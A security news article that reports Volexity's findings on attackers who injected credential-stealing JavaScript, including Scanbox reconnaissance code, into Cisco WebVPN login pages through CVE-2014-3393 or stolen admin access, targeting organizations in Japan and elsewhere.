Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Identity & Access

Attackers Target Organizations via Cisco WebVPN

A Cisco VPN product has been targeted by malicious actors looking to steal sensitive credentials and maintain access to compromised networks, according to incident response and threat intelligence company Volexity.

A Cisco VPN product has been targeted by malicious actors looking to steal sensitive credentials and maintain access to compromised networks, according to incident response and threat intelligence company Volexity.

The security firm says it has spotted attacks against several organizations via the Cisco Clientless SSL VPN (WebVPN), a product that allows Cisco Adaptive Security Appliance (ASA) customers to securely gain access to the corporate network via a web-based portal. Users can be allowed to access internal files and web resources using the VPN solution so it’s important to ensure that it’s properly protected against hacker attacks.

According to experts, attackers have used two different methods to compromise access credentials by targeting the login page used by Cisco WebVPN customers.

The first method involves a portal customization integrity flaw (CVE-2014-3393) whose existence was disclosed by Cisco in October 2014. The vulnerability, caused by improper authentication checks in the portal’s customization framework, allows a remote, unauthenticated attacker to modify the content of the WebVPN portal. The changes made by the attacker are persistent even if the device is reloaded or the ASA software is changed.

In November 2014, shortly after Cisco patched the vulnerability, Alec Stuart-Muirk, the researcher who reported the security hole to the networking giant, released additional details along with a Metasploit module designed to exploit the weakness.

By February 2015, attacks exploiting CVE-2014-3393 had already been spotted in the wild and Cisco released a security notice to warn customers and provide them the information needed to detect attacks and remove the malicious code.

“An exploit could allow an unauthenticated and unauthorized attacker to modify the content of the Clientless SSL VPN portal and include malicious code which could be used for several type of web based attack which include and are not limited to XSS, stealing of credential, serving malware etc.,” Stefano De Crescenzo, Incident Manager at Cisco’s Product Security Incident Response Team (PSIRT), said at the time.

In the attacks observed by Volexity, attackers injected malicious JavaScript code into the targeted organization’s login page. The code called a remotely-hosted online script designed to steal form data.

Advertisement. Scroll to continue reading.

In one campaign observed by the security firm, the attackers hosted the script on the hacked website of a legitimate NGO. The list of victims included medical organizations, think tanks, NGOs, universities and academic institutions, and multinational electronics and manufacturing companies.

While in some cases the malicious actors leveraged the Cisco WebVPN exploit to modify the login page, researchers believe some attackers also planted their code by gaining administrative access to the system.

“Attackers are typically able to gain ‘legitimate’ access throughout a victim organization’s environment by installing keyloggers, dumping credentials from systems, exfiltrating documents (spreadsheets) that contain password lists, and identifying passwords that are commonly reused by administrators,” Volexity founder Steven Adair explained in a blog post on Wednesday. “Once armed with these credentials, an attacker with access to a victim’s network can typically perform the same functions as any administrator or highly-privileged individual within the company.”

In some cases it’s also possible that the attackers modified the login page after obtaining administrative credentials for the Cisco ASA appliance, Adair noted.

Many of the attacks observed by Volexity were aimed at high-tech and government organizations in Japan. In these attacks, malicious actors modified the Cisco WebVPN login pages to load JavaScript code associated with the reconnaissance framework called “Scanbox.” The framework, which appears to be used primarily by Chinese APT actors, has been spotted in operations aimed at Japanese organizations in the industrial sector, the Uyghur population in China, a US-based think tank, and a Korean organization in the hospitality sector.

While it’s mainly designed for reconnaissance, Scanbox also allows its operators to capture keystrokes and collect cookie data.

An analysis of the hostnames and domains used by the attackers monitored by Volexity revealed that they owned domains designed to look like they were affiliated with Google, Symantec and the Swiss multinational pharmaceutical company Novartis. Some of the hostnames were also linked to activity associated with PlugX, a piece of malware often used by Chinese actors.

WebVPN is not the only Cisco product targeted by malicious actors. Last month, researchers reported uncovering hundreds of Cisco routers on which attackers had planted malicious firmware by leveraging stolen credentials and a legitimate process available to administrators.

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Understand how to go beyond effectively communicating new security strategies and recommendations.

Register

Join us for an in depth exploration of the critical nature of software and vendor supply chain security issues with a focus on understanding how attacks against identity infrastructure come with major cascading effects.

Register

Expert Insights

Related Content

Identity & Access

Zero trust is not a replacement for identity and access management (IAM), but is the extension of IAM principles from people to everyone and...

CISO Strategy

Okta is blaming the recent hack of its support system on an employee who logged into a personal Google account on a company-managed laptop.

Compliance

Government agencies in the United States have made progress in the implementation of the DMARC standard in response to a Department of Homeland Security...

Email Security

Many Fortune 500, FTSE 100 and ASX 100 companies have failed to properly implement the DMARC standard, exposing their customers and partners to phishing...

Funding/M&A

The private equity firm merges the newly acquired ForgeRock with Ping Identity, combining two of the biggest names in enterprise IAM market.

Identity & Access

Hackers rarely hack in anymore. They log in using stolen, weak, default, or otherwise compromised credentials. That’s why it’s so critical to break the...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Application Security

Fortinet on Monday issued an emergency patch to cover a severe vulnerability in its FortiOS SSL-VPN product, warning that hackers have already exploited the...